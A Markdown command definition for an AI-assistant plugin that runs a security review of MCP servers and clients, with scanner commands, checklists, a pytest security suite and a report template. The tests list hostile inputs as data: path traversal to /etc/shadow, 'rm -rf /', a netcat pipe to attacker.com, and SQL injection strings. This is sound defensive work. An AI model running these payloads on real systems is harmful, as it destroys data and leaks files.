gh-phaezer-claude-mkt-plugins-mcp/commands/review-mcp-security.md

---
description: Security review of MCP server or client
argument-hint: Path to MCP project for security review
---

# Security Review of MCP Implementation

Perform comprehensive security review of an MCP server or client implementation.

## Usage

```
/review-mcp-security [project-path]
```

**Arguments:**
- `project-path`: Path to MCP project directory (optional, defaults to current directory)

**Examples:**
```
/review-mcp-security
/review-mcp-security ./my-mcp-server
/review-mcp-security ../production-mcp-client
```

## What This Command Does

This command performs a thorough security review of an MCP implementation, checking for:
- Input validation vulnerabilities
- Path traversal issues
- Command/SQL injection risks
- API key exposure
- Information disclosure
- Dependency vulnerabilities
- Rate limiting issues
- Transport security

## Workflow Steps

### Step 1: Detect Project Details

Analyze the project to gather information:
1. **Type**: Server or Client?
2. **Language**: Python or TypeScript?
3. **External Integrations**: APIs, databases, filesystems?
4. **Authentication**: How are credentials managed?
5. **Transport**: stdio, SSE, or both?

### Step 2: Launch Security Reviewer Agent

Use the Task tool to launch `mcp-security-reviewer` agent.

**Agent Task:**
```
Perform comprehensive security review of MCP [server/client]:

Project: [project name]
Location: [project path]
Language: [Python/TypeScript]
Type: [Server/Client]

Review Areas:
1. Input Validation
   - Tool parameter validation
   - Resource URI parsing
   - File path handling
   - SQL query construction (if applicable)
   - Command execution parameters

2. Authentication & Authorization
   - API key management
   - Token storage and handling
   - Permission checking
   - Rate limiting

3. Data Access Controls
   - File system access restrictions
   - Database query permissions
   - API endpoint access
   - Resource whitelisting

4. Information Disclosure
   - Error messages
   - Log output
   - Stack traces
   - Debug information

5. Dependency Security
   - Known vulnerabilities
   - Outdated packages
   - Malicious packages

6. Transport Security (if SSE)
   - HTTPS usage
   - Certificate validation
   - Man-in-the-middle protection

Deliverables:
- Complete security review report
- Vulnerability list with severity (Critical/High/Medium/Low)
- Specific code locations
- Remediation recommendations with code examples
- Security checklist results
```

### Step 3: Run Automated Security Scans

**Python Security Scanning:**

```bash
# Install security tools
pip install bandit safety pip-audit

# Bandit - code security scanner
bandit -r src/ -f json -o bandit-report.json

# Safety - dependency vulnerability checker
safety check --json > safety-report.json

# pip-audit - check for vulnerable dependencies
pip-audit --format json > pip-audit-report.json
```

**TypeScript Security Scanning:**

```bash
# npm audit - check for vulnerable dependencies
npm audit --json > npm-audit-report.json

# Snyk - comprehensive security scanning
npm install -g snyk
snyk auth
snyk test --json > snyk-report.json

# ESLint with security plugin
npm install -g eslint eslint-plugin-security
eslint --ext .ts src/ --format json > eslint-security-report.json
```

### Step 4: Manual Code Review

Review critical security-sensitive code areas:

**For Servers:**

1. **Tool Input Validation:**
```python
# Check each tool for proper validation
@mcp.tool()
def read_file(path: str) -> dict:
    # LOOK FOR:
    # - Path sanitization
    # - Base directory restriction
    # - Input length limits
    # - Character whitelisting
```

2. **Command Execution:**
```python
# Check for shell=True usage (DANGEROUS)
subprocess.run(command, shell=True)  # ❌ VULNERABLE

# Should use array and shell=False
subprocess.run([cmd, arg1, arg2], shell=False)  # ✓ SAFE
```

3. **SQL Queries:**
```python
# Check for string concatenation (VULNERABLE)
query = f"SELECT * FROM users WHERE id = {user_id}"  # ❌

# Should use parameterized queries
query = "SELECT * FROM users WHERE id = ?"  # ✓
db.execute(query, (user_id,))
```

4. **API Key Management:**
```python
# Check for hardcoded secrets (VULNERABLE)
API_KEY = "sk-1234567890"  # ❌

# Should use environment variables
API_KEY = os.getenv("API_KEY")  # ✓
```

**For Clients:**

1. **Server Connection Validation:**
2. **Tool Parameter Sanitization:**
3. **Resource URI Validation:**
4. **Credential Storage:**

### Step 5: Check Security Best Practices

Verify implementation of security best practices:

**Input Validation Checklist:**
- [ ] All tool parameters validated
- [ ] Type checking enforced (Pydantic/Zod)
- [ ] Input length limits set
- [ ] Character whitelisting for sensitive inputs
- [ ] Regex patterns validated

**File System Security:**
- [ ] Base directory restrictions enforced
- [ ] Path traversal prevention implemented
- [ ] Symlink attack prevention
- [ ] File type validation
- [ ] Size limits enforced

**Command Execution Security:**
- [ ] shell=False always used
- [ ] Command whitelist implemented
- [ ] Argument sanitization
- [ ] Timeout limits set

**Database Security:**
- [ ] Parameterized queries only
- [ ] Read-only connections where possible
- [ ] Query timeout limits
- [ ] Connection pooling secure

**API Security:**
- [ ] Credentials in environment variables
- [ ] No secrets in logs
- [ ] HTTPS only for external APIs
- [ ] Certificate validation enabled
- [ ] Timeout limits set

**Error Handling:**
- [ ] No stack traces to users
- [ ] Generic error messages
- [ ] Detailed errors logged securely
- [ ] Error correlation IDs

**Rate Limiting:**
- [ ] Per-tool rate limits
- [ ] Per-user rate limits (if applicable)
- [ ] Global rate limits
- [ ] Backoff strategies

**Logging:**
- [ ] No credentials logged
- [ ] Sensitive data redacted
- [ ] Security events logged
- [ ] Log rotation configured

### Step 6: Dependency Vulnerability Assessment

Analyze all dependencies for known vulnerabilities:

**Python:**
```bash
# Check all dependencies
safety check --full-report

# Check specific package
pip show package-name
```

**TypeScript:**
```bash
# Check all dependencies
npm audit

# Fix automatically where possible
npm audit fix

# Check for major updates
npm outdated
```

**Create Dependency Report:**

| Package | Current | Vulnerability | Severity | Fixed In | Action |
|---------|---------|---------------|----------|----------|--------|
| requests | 2.25.0 | CVE-2023-xxxxx | High | 2.31.0 | Update |
| axios | 0.21.1 | CVE-2021-3749 | Critical | 0.21.2 | Update |

### Step 7: Test Security Scenarios

Run security-specific tests:

```python
import pytest

class TestSecurityScenarios:
    """Security-focused test cases"""

    def test_path_traversal_prevention(self):
        """Attempt path traversal attacks"""
        malicious_paths = [
            "../../../etc/passwd",
            "..\\..\\..\\windows\\system32\\config\\sam",
            "/etc/shadow",
            "C:\\Windows\\System32\\config\\SAM"
        ]

        for path in malicious_paths:
            result = mcp.call_tool("read_file", {"path": path})
            assert result["success"] is False
            assert "access denied" in result["error"].lower()

    def test_command_injection_prevention(self):
        """Attempt command injection"""
        malicious_commands = [
            "ls; rm -rf /",
            "ls && cat /etc/passwd",
            "ls | nc attacker.com 4444"
        ]

        for cmd in malicious_commands:
            result = mcp.call_tool("run", {"command": cmd})
            assert result["success"] is False

    def test_sql_injection_prevention(self):
        """Attempt SQL injection"""
        malicious_inputs = [
            "admin' OR '1'='1",
            "'; DROP TABLE users; --",
            "admin' UNION SELECT password FROM users--"
        ]

        for username in malicious_inputs:
            result = mcp.call_tool("search_user", {"username": username})
            # Should not return unauthorized data
            assert result.get("users", []) == []

    def test_no_secrets_in_errors(self):
        """Ensure secrets not exposed in errors"""
        result = mcp.call_tool("api_call_with_token", {"endpoint": "/invalid"})

        # Check error doesn't contain API key
        error_str = str(result).lower()
        assert "api_key" not in error_str
        assert "token" not in error_str
        assert "secret" not in error_str

    def test_rate_limiting(self):
        """Verify rate limiting works"""
        # Make many requests rapidly
        results = []
        for i in range(150):
            result = mcp.call_tool("expensive_operation", {})
            results.append(result)

        # Some requests should be rate limited
        rate_limited = [r for r in results if "rate limit" in r.get("error", "").lower()]
        assert len(rate_limited) > 0
```

### Step 8: Generate Security Report

Create comprehensive security report:

```markdown
# Security Review Report

**Project**: [project name]
**Version**: [version]
**Review Date**: [date]
**Reviewer**: Security Review Agent

## Executive Summary

[Brief overview of security posture]

**Overall Risk Level**: [Low/Medium/High/Critical]

**Summary**:
- Critical Issues: [count]
- High Severity: [count]
- Medium Severity: [count]
- Low Severity: [count]
- Informational: [count]

## Critical Vulnerabilities (Fix Immediately)

### 1. Path Traversal in read_file Tool

**Severity**: Critical
**CWE**: CWE-22 (Path Traversal)
**Location**: `src/tools/filesystem.py:45`

**Description**:
The `read_file` tool does not validate file paths, allowing attackers to read arbitrary files on the system.

**Vulnerable Code**:
```python
@mcp.tool()
def read_file(path: str) -> dict:
    with open(path, 'r') as f:
        return {"content": f.read()}
```

**Proof of Concept**:
```
read_file(path="../../../etc/passwd")
```

**Impact**:
Attackers can read sensitive files including:
- /etc/passwd, /etc/shadow
- SSH keys
- Application secrets
- Database credentials

**Remediation**:
```python
from pathlib import Path

BASE_DIR = Path("/safe/data/directory").resolve()

@mcp.tool()
def read_file(path: str) -> dict:
    try:
        # Resolve and validate path
        file_path = (BASE_DIR / path).resolve()
        file_path.relative_to(BASE_DIR)  # Raises ValueError if outside BASE_DIR

        with open(file_path, 'r') as f:
            return {"success": True, "content": f.read()}

    except ValueError:
        return {"success": False, "error": "Access denied"}
    except Exception as e:
        return {"success": False, "error": "Read failed"}
```

[Continue for all critical issues...]

## High Severity Issues

[List all high severity issues with similar format]

## Medium Severity Issues

[List all medium severity issues]

## Low Severity Issues

[List all low severity issues]

## Dependency Vulnerabilities

| Package | Version | Vulnerability | Severity | Fixed Version |
|---------|---------|---------------|----------|---------------|
| [package] | [current] | [CVE-ID] | [severity] | [fixed] |

## Security Checklist

### Input Validation
- [ ] Tool parameters validated ❌
- [ ] Type checking enforced ✓
- [ ] Length limits set ✓
- [ ] Character whitelisting ❌

### Authentication & Authorization
- [ ] API keys in environment ❌ (hardcoded in config.py)
- [ ] No secrets in code ❌
- [ ] Rate limiting implemented ✓
- [ ] Token validation ✓

### Data Access
- [ ] File system restricted ❌ (CRITICAL)
- [ ] SQL injection prevented ✓
- [ ] Command injection prevented ❌ (HIGH)

### Error Handling
- [ ] No stack traces exposed ✓
- [ ] Generic error messages ✓
- [ ] Secrets not in logs ⚠️ (needs verification)

## Recommendations

### Immediate Actions (Within 1 Week)
1. **Fix path traversal** in read_file tool
2. **Remove hardcoded API keys** - move to environment variables
3. **Fix command injection** in run_command tool
4. **Update vulnerable dependencies**:
   - requests: 2.25.0 → 2.31.0
   - axios: 0.21.1 → 1.6.0

### Short Term (Within 1 Month)
1. Implement comprehensive input validation for all tools
2. Add rate limiting to all expensive operations
3. Implement security logging for audit trail
4. Add automated security scanning to CI/CD

### Long Term
1. Regular security audits (quarterly)
2. Automated dependency updates
3. Security training for development team
4. Penetration testing

## Testing Recommendations

Add these security tests:
```python
# tests/security/test_security.py
def test_path_traversal():
    """Verify path traversal prevention"""

def test_command_injection():
    """Verify command injection prevention"""

def test_no_hardcoded_secrets():
    """Scan codebase for hardcoded secrets"""
```

## Compliance

- [ ] OWASP Top 10 addressed
- [ ] CWE Top 25 reviewed
- [ ] Secure coding practices followed
- [ ] Security documentation present

## Conclusion

[Overall assessment and required actions]

**Next Review**: [recommended date]
```

### Step 9: Provide Remediation Guidance

For each vulnerability, provide:
1. **Detailed explanation** of the issue
2. **Severity rating** with justification
3. **Working code example** showing the fix
4. **Testing recommendations**
5. **Additional resources**

### Step 10: Generate Summary

```
✓ Security Review Complete: [project-name]

Security Assessment:
  Overall Risk: HIGH ⚠️
  Critical Issues: 2
  High Severity: 3
  Medium Severity: 5
  Low Severity: 8

Top Issues to Fix:
  1. [CRITICAL] Path traversal in read_file tool
  2. [CRITICAL] Hardcoded API keys in config.py
  3. [HIGH] Command injection in run_command
  4. [HIGH] SQL injection in search_users
  5. [HIGH] Information disclosure in error messages

Dependency Issues:
  - 3 packages with known vulnerabilities
  - 2 packages severely outdated

Recommendations:
  ⚠️  Fix critical issues immediately before deployment
  ⚠️  Update all vulnerable dependencies
  ✓  Add security tests to test suite
  ✓  Implement automated security scanning in CI/CD

Detailed report: ./security-report.md
Scan results: ./security-scans/
```

## Success Criteria

- [ ] Security review agent completed analysis
- [ ] Automated security scans run
- [ ] Manual code review performed
- [ ] Security test cases created
- [ ] Vulnerabilities documented with severity
- [ ] Remediation guidance provided
- [ ] Security report generated
- [ ] Dependencies checked for vulnerabilities

This command ensures MCP implementations follow security best practices and are safe for production use.